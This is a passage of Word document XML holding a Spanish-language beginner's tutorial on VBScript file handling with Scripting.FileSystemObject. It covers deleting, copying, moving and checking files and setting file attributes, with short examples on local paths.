        <w:t>WScript.Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> mezclados, ya que lo que nos interesa son las cosas que podemos hacer con ellos y no una lista completa de sus funciones. Pero dejaré aparte el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Scripting.Dictionary</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, al tratarse de un objeto un tanto diferente a los otros dos. Comentar también que no es necesario copiar cada vez que se quiera usar una función los objetos en las variables, basta con que lo copiemos una vez para poder usar todas las funciones que queramos. Y con esto, doy fin a esta pequeña introducción.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="77" w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Programación con Objetos: Trabajando con Archivo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Ahora vamos a ver un grupo de funciones pertenecientes a ambos objetos mencionados en la introducción, que permiten realizar las </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tareas básicas de tratamiento de archivos</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. En otras palabras, aprenderemos a que nuestro script pueda borrar, copiar, mover, renombrar, etc cualquier tipo de archivo que tengamos. Para ello, veamos las diversas funciones que tenemos a disposición:</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DeleteFile</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función borra el archivo que le indiquemos. El argumento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indica que si se eliminan los archivos con el atributo de solo lectura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que no lo hace, por si no queremos borrar algo que sea solo lectura. La sintaxis "c:\Doc2.txt" indica la ruta y el archivo que se va a eliminar.</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DeleteFile </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"c:\Doc2.txt"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, True</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l ser esta la primera función vamos a darle una explicación especial, que se aplica de forma genérica a todas las demás </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">funciones. En primer lugar, vemos como asignamos a la variable fso el objeto de esta función: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Scripting.FileSystemObject</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. A partir de esto debéis ser capaces de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>saber de que objeto es cada función</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, pues en los ejemplos incluyo el proceso de copia del objeto a la variable con ese fin. Esto lo hemos visto bastante y esta claro. Luego, es la segunda línea tenemos a la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DeleteFile</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (que nace de la variable fso, pues ella quien la tiene ahora), con dos argumentos que se ha explicado que son y hacen cada uno. El primero de ellos, la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ruta del archivo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, si no sabes como colocarla (más vale que te asegures de aprenderlo bien), solo ves a la carpeta por el explorador y mira la barra de dirección:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1978"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2980690" cy="1951990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5270" name="Picture 5270"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="5270" name="Picture 5270"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2980690" cy="195199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luego mira el nombre del archivo con extensión incluida. Luego lo juntas todo, de forma que si tienes “</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C:\Archivos de Programa</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>” y el archivo se llama “</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Documento.doc</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>” (fíjate que ponemos también la extensión “.doc”), lo que debes poner es la unión: “</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C:\Archivos de Programa\Documento.doc”</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. No será difícil cuando le cojas la práctica. Por otro lado, este es un ejemplo del uso de la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sin recoger en una variable el resultado</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, pues lo único que hace es borrarlo y punto (si no se pudiera provoca un error en tiempo de ejecución, así que es bueno tener el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>On Error resume Next</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> a mano). Bueno, en realidad devuelve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 lo consigue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si no, así que como practica dejo que pruebes tú a asignarle una variable y comprobar si lo que digo es verdad con el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Esto también se aplica a la mayoría de las funciones siguientes.</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gund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CopyFile</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esta función copia el archivo que le indiquemos.</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La sintaxis "</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>c:\Doc2.doc</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">", indica la ruta y el archivo que se va a copiar y la sintaxis </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>c:\Mis Documentos\a.doc"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> indica la ruta y el nombre a donde se copia el archivo. Un total de dos rutas, una de origen (la primera) y la otra de destino. Lo demás es igual que en la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>anterior: se debe usar una variable que contenga el objeto con el método explicado.</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CopyFile </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"c</w:t>
      </w:r>
      <w:r w:rsidR="003165B4">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:\</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Doc2.doc"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, "c:\Mis Documentos\a.doc"</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terc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MoveFile</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función mueve el archivo que le indiquemos. </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La sintaxis "</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>c:\Doc2.doc",</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> indica la ruta y el archivo que se va a mover y la sintaxis </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"c:\Mis Documentos\a.doc"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> indica la ruta y el nombre de destino. Esta función también se usa para cambiar el nombre de los archivos, moviéndolos a la misma </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>carpeta</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> pero utilizando un nombre diferent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MoveFile </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"c:\Doc2.doc"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, "c:\Mis Documentos\a.doc"</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cuar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i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">FileExists. </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta función comprueba si un archivo existe o no, devolviendo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 existe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si no existe. Esta función se suele usar para comprobar la existencia de un archivo antes de borrarlo (para no causar errores), etc. Su único argumento es la ruta del archivo que queremos comprobar su existenc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FileExists</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c:\Doc2.doc"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>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a función es sumamente importante pues antes de realizar funciones de borrado se debe usar </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>esta con la sentencia If</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para evitar mandar borrar algo que no existe (o crear algo que ya existe, o mover o copiar cosas que no existen…), </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">evitando así provocar errores, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>que fastidiarían el funcionamiento de tu scrip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quin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Attributes</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función cambia los atributos del archivo indicado. Vemos que en la segunda línea se indica la ruta y el archivo mediante "c:\Doc2.doc", y recogemos el valor en una variable mediante </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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 xml:space="preserve"> Esto es así porque le damos a la variable de forma binaria una estructura de un archivo, y al ser un dato binario </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">necesita el </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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 xml:space="preserve"> Así que al usar la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>GetFile</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, le damos a la variable arc mediante el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a estructura del archivo.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en la tercera línea usamos una </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>función de la estructura que le hemos dado a arc</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para cambiar los atributos, mediante un número. Esto es común en diversas funciones, que requieren de la estructura de un archivo para funcionar. En el ejemplo siguiente lo vemos clar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3204"/>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204"/>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i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>arc</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>fso.GetFile</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">("c:\Doc2.doc") </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>arc</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.Attributes = 3</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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>realidad</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> no es difícil, basta copiarlo cada vez que necesitemos hacer esta función. En la tercera línea en la que se le dan los nuevos atributos, debemos hacer lo siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="235"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para quitarlos todos los atributos se coloca el numero 0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>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Para colocar uno o mas atributos se suman los siguientes valores según los atributos que queramos darle: Solo lectura (valor 1), Oculto (valor 2) y Sistema (valor 4)</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ejemplo se le da el valor 3 lo cual significa que se le han dado los atributos de Solo lectura y Oculto </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">(1+2=3). </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Vemos que le damos el valor con el símbolo del “=”, esto se debe a que como he explicado, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>se trata de una estructura de datos</w:t>
      </w:r>
